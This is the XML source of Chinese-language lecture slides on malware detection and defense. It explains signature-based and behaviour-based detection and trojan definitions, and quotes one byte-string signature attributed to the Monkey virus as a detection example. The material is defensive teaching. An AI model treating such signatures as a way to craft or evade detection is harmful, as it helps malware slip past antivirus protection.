            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64589" name="Line 77"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1303338" y="2262188"/>
            <a:ext cx="6167437" cy="7937"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C0C0C0"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64600" name="Text Box 88"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1827214" y="5018088"/>
            <a:ext cx="5611812" cy="579437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码检测及防御</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="248730119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spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>静态检测（特征检测）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：根据恶意代码的特征码（代码散列码、代码中的关键字、字节串、特定端口等）进行检测</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>动态检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：根据恶意代码执行后的异常行为进行检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155152486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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码检测：特征检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2792413" y="1360488"/>
            <a:ext cx="3152775" cy="1257300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="930805" y="2690813"/>
            <a:ext cx="6477000" cy="3171825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29777911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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码检测：特征检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1063625" y="1287463"/>
            <a:ext cx="6962775" cy="4648200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1150938" y="3454400"/>
            <a:ext cx="4064000" cy="558800"/>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1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="916839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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码检测：特征检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150938" y="1332441"/>
            <a:ext cx="6648450" cy="4972050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="132821" y="1332441"/>
            <a:ext cx="6667500" cy="3219450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2023533" y="1070503"/>
            <a:ext cx="6553200" cy="5495925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214578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1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="1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368C1EF-402C-4633-9999-371C35A0CE83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="132736" y="1230769"/>
            <a:ext cx="9011264" cy="4897907"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B02FD441-2887-4A56-91CB-A8871B0CBB4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1317824" y="152239"/>
            <a:ext cx="6827939" cy="958850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码检测：特征检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1718108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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>计算机木马</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12294" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525462" y="1257299"/>
            <a:ext cx="7837487" cy="4843697"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RFC1244</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的定义可以澄清一些模糊概念：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>首先木马程序并不一定实现某种对用户来说有意义或有帮助的功能，但却会实现一些隐藏的、危险的功能；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>其次木马所实现的主要功能并不为受害者所知，只有程序编制者最清楚。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>第三，这个定义暗示“有效负载”是恶意的。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4123183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12294">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12294">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12294">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12294">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12294">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12294">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12294">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1229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12294">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12294">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12294">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1229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grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12294">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12294">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12294">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1229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4" grpId="0" uiExpand="1"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2B692C6-C03D-4C45-800F-1CAC5526C8D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1862047"/>
            <a:ext cx="9144000" cy="3782837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B02FD441-2887-4A56-91CB-A8871B0CBB4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1317824" y="152239"/>
            <a:ext cx="6827939" cy="958850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码检测：特征检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="283320703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63AEA88-29F5-44ED-8960-C1ABA81DAB94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658812" y="1554163"/>
            <a:ext cx="7960531" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>将恶意代码中的某段特有的十六进制字节码或字符串（如某个特定的域名或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>地址）作为特征码，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Monkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>病毒代码中的十六进制字节码“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>8BFB%%B90002%%268A0534??AAE2F8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB2E144F-BC1B-470A-AF13-EC505D6771C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码检测：特征检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="78827879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B154F31-6A81-495C-8A91-C92BE9831446}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553882" y="1524183"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>特征码检测技术的主要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>优点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>是简单、检测速度快、准确率高，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不足：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>不能检测未知恶意软件，对于恶意代码变体的容忍度也很低，稍微变形便无法识别；用户需要不断地升级（离线或在线）杀毒软件特征库，同时随着特征库越来越大，检测的效率会越来越低。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E334ECD-4BD3-48B8-8015-7E1A8BBA768D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码检测：特征检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128172045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4C8071A-0E5C-44FA-BE09-499CBF453EE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1356558"/>
            <a:ext cx="7772400" cy="5014262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>动态检测技术基于定义的恶意代码异常行为规则，实时监控进程的动态行为，当发现有违犯规则的行为出现，则给出异常告警</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>这些行为主要包括：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件行为</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
              <a:spcBef>
